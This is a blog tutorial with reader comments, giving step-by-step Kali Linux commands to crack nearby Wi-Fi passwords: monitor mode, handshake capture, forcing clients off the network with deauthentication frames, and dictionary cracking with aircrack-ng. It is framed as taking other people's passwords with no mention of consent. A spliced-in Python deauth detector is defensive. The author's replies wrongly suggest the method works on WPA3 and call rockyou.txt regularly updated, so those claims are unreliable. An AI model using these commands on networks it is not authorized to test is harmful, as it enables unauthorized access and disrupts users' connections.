Hack WiFi using Kali Linux

Originally published at dev.to

Today, we will understand how to hack nearby wifi passwords.

Prerequisites:

  • The Wi-Fi network should be in range (of course)
  • Kali Linux OS (preferred)
  • A Wi-Fi interface (already present if you are using a laptop)

The Kali Linux tools we'll be using are:

  • airmon-ng
  • airodump-ng
  • aireplay-ng
  • aircrack-ng

Let's go through the full steps for getting the password of a reachable Wi-Fi network.

Steps to reproduce:

  1. Go to the console and check the name of your Wi-Fi interface:

ifconfig

  2. Kill all running processes and network managers that could interfere with the Wi-Fi interface:

airmon-ng check kill

  3. Put the interface into monitor mode using airmon-ng:

airmon-ng start YOUR_WIFI_INTERFACE_NAME

airmon-ng start wlan0

airmon-ng renames the interface when it enables monitor mode (here wlan0 becomes wlan0mon), so use the new name in the following steps.

  4. View all the Wi-Fi networks around you:

airodump-ng YOUR_INTERFACE_NAME

airodump-ng wlan0mon

airodump-ng is the packet-capture tool of the suite.

  5. After some time, press Ctrl+C to stop scanning once some Wi-Fi networks are listed.

  6. Now we need to capture the traffic of the target network and view the clients connected to it:

airodump-ng -c 1 --bssid BSSID_NUMBER/MAC_ADDRESS -w OUTPUT_FILE_PREFIX YOUR_WIFI_INTERFACE_NAME

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root/hacking wlan0mon

-c is the channel number of the network (taken from the scan in step 4), --bssid is the MAC address of the access point, and -w is the prefix of the capture file: airodump-ng appends a counter and an extension, so this example writes /root/hacking-01.cap.

Now our approach will be to disconnect all the clients connected to the network and sniff the packets they send while reconnecting to the same network. When a client reconnects, you'll see something called the WPA handshake in the current airodump-ng window.

  7. Open a new terminal and disconnect the clients from that network with the following command:

aireplay-ng -0 10 -a BSSID_NUMBER/MAC_ADDRESS YOUR_WIFI_INTERFACE_NAME

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

aireplay-ng injects the frames needed to disconnect the clients:
-0 selects deauthentication (so that clients retry the connection),
10 is the number of deauthentication packets to send; you can increase or decrease it depending on how much time you want to spend on this, and
-a is the BSSID of the access point.

  8. You can now close this window. Capturing is complete from our end; what remains is to crack the password from the capture. To find the capture file, navigate to the directory you provided in step 6 above. You'll find a .cap file there. That's our file.

  9. For cracking the .cap file, we have different techniques. We'll use the simplest one, using aircrack-ng only, which cracks the password with a wordlist. You can use the rockyou.txt wordlist, which is the most commonly used one and is updated on a regular basis.

Following is the command to run:

aircrack-ng -a2 -b BSSID_NUMBER/MAC_ADDRESS -w WORDLIST_FILE_LOCATION CAP_FILE_LOCATION

aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap

aircrack-ng is the WEP/WPA-PSK key cracking program of the suite:
-a2 forces the WPA-PSK attack mode (it covers both WPA and WPA2 captures; -a1 would be WEP),
-b is the BSSID of the access point, and
-w is the wordlist file location.

If the password is successfully cracked, you'll get the confirmation message "KEY FOUND!".
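As an added, defensive counterpart to the deauthentication step (step 7), and not code from the original post: a small detector that flags a burst of 802.11 deauthentication frames aimed at one BSSID, which is the trace that "aireplay-ng -0 10" leaves in a monitor-mode capture. The frame bytes below are constructed test data using the post's example BSSID; the 802.11 header is parsed by hand so no capture library is needed, and the window/threshold values are assumptions you would tune for your environment.

```python
import struct
from collections import defaultdict
DEAUTH = (0, 12)  # 802.11 management frame (type 0), deauthentication subtype (12)

def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_frame(raw: bytes):
    """Decode the 802.11 header fields a deauth detector needs: (type, subtype, addr1, addr2, addr3, reason)."""
    if len(raw) < 24:
        return None
    fc = raw[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    a1, a2, a3 = mac(raw[4:10]), mac(raw[10:16]), mac(raw[16:22])
    reason = None
    if (ftype, subtype) == DEAUTH and len(raw) >= 26:
        reason = struct.unpack_from("<H", raw, 24)[0]  # reason code follows the 24-byte header
    return ftype, subtype, a1, a2, a3, reason

def build_frame(ftype, subtype, a1, a2, a3, body=b""):
    """Assemble a minimal 802.11 frame; used here only to construct offline test data."""
    fc = bytes([(subtype << 4) | (ftype << 2), 0])
    m = lambda s: bytes(int(x, 16) for x in s.split(":"))
    return fc + b"\x00\x00" + m(a1) + m(a2) + m(a3) + b"\x00\x00" + body

def deauth_alerts(capture, window=2.0, threshold=5):
    """capture: list of (timestamp_s, raw_frame). Returns {bssid: peak count} for every BSSID
    that saw at least `threshold` deauth frames inside any `window`-second span."""
    times_by_bssid = defaultdict(list)
    for ts, raw in capture:
        p = parse_frame(raw)
        if p and (p[0], p[1]) == DEAUTH:
            times_by_bssid[p[4]].append(ts)  # addr3 carries the BSSID in a deauth frame
    alerts = {}
    for bssid, times in times_by_bssid.items():
        times.sort()
        peak = j = 0
        for i, t in enumerate(times):
            while times[j] < t - window:  # slide the window start forward
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

# Constructed sample capture: 10 broadcast deauths spoofed from the post's example AP (the pattern
# "aireplay-ng -0 10" produces), one isolated deauth from another AP, one beacon and one data frame.
AP, OTHER, BCAST = "80:35:c1:13:c1:2c", "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff"
REASON7 = struct.pack("<H", 7)  # reason 7 = "class 3 frame received from nonassociated station"
SAMPLE_CAPTURE = [(10.0 + 0.1 * i, build_frame(0, 12, BCAST, AP, AP, REASON7)) for i in range(10)]
SAMPLE_CAPTURE += [(15.0, build_frame(0, 12, "11:22:33:44:55:66", OTHER, OTHER, REASON7)),
                   (10.5, build_frame(0, 8, BCAST, AP, AP)),                 # beacon, ignored
                   (10.6, build_frame(2, 0, AP, "11:22:33:44:55:66", AP))]   # data frame, ignored
```

A single deauth from a second AP stays below the threshold, so only the burst against 80:35:c1:13:c1:2c is reported; in practice you would feed frames from a monitor-mode capture rather than the constructed list.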


I've tried to teach how to crack the password of a nearby Wi-Fi network for free in the simplest manner possible. However, if you're facing any difficulty, do mention it in the comments. I'll try to help.

You can follow me on LinkedIn, Instagram or check my latest projects on my GitHub. Also, you can check my portfolio too.


Nice effort putting this together—it's clear you've simplified a pretty technical process! Quick question though: have you tried this with WPA3 networks yet, or does this method only work reliably with WPA2? Would love to hear more on how it holds up with newer security protocols.

Is this like bruteforcing the encrypted password, taken from captured packets? If so, I'm sure the success rate isn't that high with a long Wi-Fi password. But still, this is good for simple penetration testing.

I haven't really tried it with WPA3, but I guess it's a simple brute force, so it must be working. You can try & discuss your findings here. Would love to discuss your findings.

Yes Manoedinata, it's a brute force, as you'll see if you read more about all the mentioned tools:

airmon-ng
airodump-ng
aireplay-ng
aircrack-ng

The success rate is low for longer & complex passwords. Moreover, you might not end up getting the password at all. It depends on how strong, long & definite your wordlist is. Thanks for the feedback.
